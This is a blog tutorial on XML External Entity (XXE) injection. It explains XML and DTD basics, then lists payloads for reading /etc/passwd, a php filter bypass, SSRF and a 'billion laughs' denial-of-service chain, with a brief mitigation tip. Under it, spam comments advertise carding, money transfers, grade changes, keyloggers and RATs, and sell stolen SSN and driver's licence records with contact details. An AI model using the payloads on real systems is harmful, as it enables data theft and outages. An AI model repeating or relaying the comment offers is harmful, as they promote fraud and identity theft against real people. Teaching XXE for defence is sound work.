Thursday, 17 January 2019

The Basic's of XXE - XML External Entity attack.

One of the prime goal in web hacking is to get a backdoor and own the target. XXE will help you to
achieve this. But before discussing about XXE Injection you must know basics of XML. and yeah memes are here to eradicate boredom.

According to google, XML is a metalanguage which allows user to define their own customized markup languages, especially in order to display documents on the internet.

some features of XML are 
  • It simplifies data transport and sharing
  • it simplifies platform change
  • it increases data availability

well, XML is boring but...

What is DTD? 
DTD stands for Document Type Defination and it defines the structure and legal elements and the attributes of an XML document.

DTD is used to verify that XML data is valid or not. DTD can be either declared externally or internally.

Internal Declaration of DTD
Inside the XML file DTD is wrapped in <!DOCTYPE> definition. Here is an example from w3schools:

NOTE : In a raw XML file you can view DTD by view-source feature.

let's Break Down this code snippet.

  • <!DOCTYPE note Defines that the root element of this document is note
  • !ELEMENT note Defines that the element note contains four other elements "to, from, heading, body"
  • <!ELEMENT to, from, heading, body (#PCDATA)> Defines the element to be of type #PCDATA.

External Declaration of DTD
If DTD is declared in an External file then the <!DOCTYPE> Definition must contain the URI to the DTD file.

Here is another code snippet from w3schools

and here is the external file which contains the DTD

#PCDATA is parsed character data

What are DTD Entities?
Entities are used to define shortcut to special characters.

for Declaration types and more information please consider reading this -

Now that's a lot of XML. Let's now get back to the maim topic XXE Injection.

Who is affected with XXE?
well, lots of apps use xml, configuration files use xml, many protocols rely on xml and some use it without even knowing it.

What can we Exploit with XXE?
Well, we can exploit XXE in various places including
  • Local File Inclusion
<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

  • Access Controll Bypass
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=">]>
  • SSRF

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "">]><foo>&xxe;</foo>

  • Denial of Service

    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
     How to Exploit XXE?
    Here is a short 2 minute video demonstrating how to exploit XXE using Burp Suite.

    How to mitigate XXE?
    The best and the easiest way to mitigate from XXE is to disable XXE by default and a lot of parsers actually do it.

    and here we end our tutorial. Thankyou so much for reading guys, below are the links for further reading check them for sure.




    1. According to google, XML is a metalanguage which allows user to define their own customized markup languages, especially in order to display documents on the internet. 1z0-1081 exam questions


      1. Hello World
        I’m hacker and Services provider
        interested in any thing i do fair deals.
        I will show you each and everything to start business
        also teaching Hacking / spamming short courses
        I have all tools that you need to spam

        .. Western Union transfer
        .. Credit cards
        .. Money adders
        .. Bill paying
        .. College fee
        .. Fake documents
        .. Grade change


    2. Hey Guys !

      USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
      All Leads have genuine & valid information

      First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

      *Price for SSN lead $2
      *You can ask for sample before any deal
      *If anyone buy in bulk, we can negotiate
      *Sampling is just for serious buyers

      ->$5 PER EACH

      ->Hope for the long term deal
      ->Interested buyers will be welcome

      **Contact 24/7**
      Whatsapp > +923172721122
      Email >
      Telegram > @leadsupplier
      ICQ > 752822040

    3. Hello all
      am looking few years that some guys comes into the market
      they called themselves hacker, carder or spammer they rip the
      peoples with different ways and it’s a badly impact to real hacker
      now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
      Anyone want to make deal with me any type am available but first
      I‘ll show the proof that am real then make a deal like

      Available Services

      ..Wire Bank Transfer all over the world

      ..Western Union Transfer all over the world

      ..Credit Cards (USA, UK, AUS, CAN, NZ)

      ..School Grade upgrade / remove Records

      ..Spamming Tool

      ..keyloggers / rats

      ..Social Media recovery

      .. Teaching Hacking / spamming / carding (1/2 hours course)

      discount for re-seller

      Contact: 24/7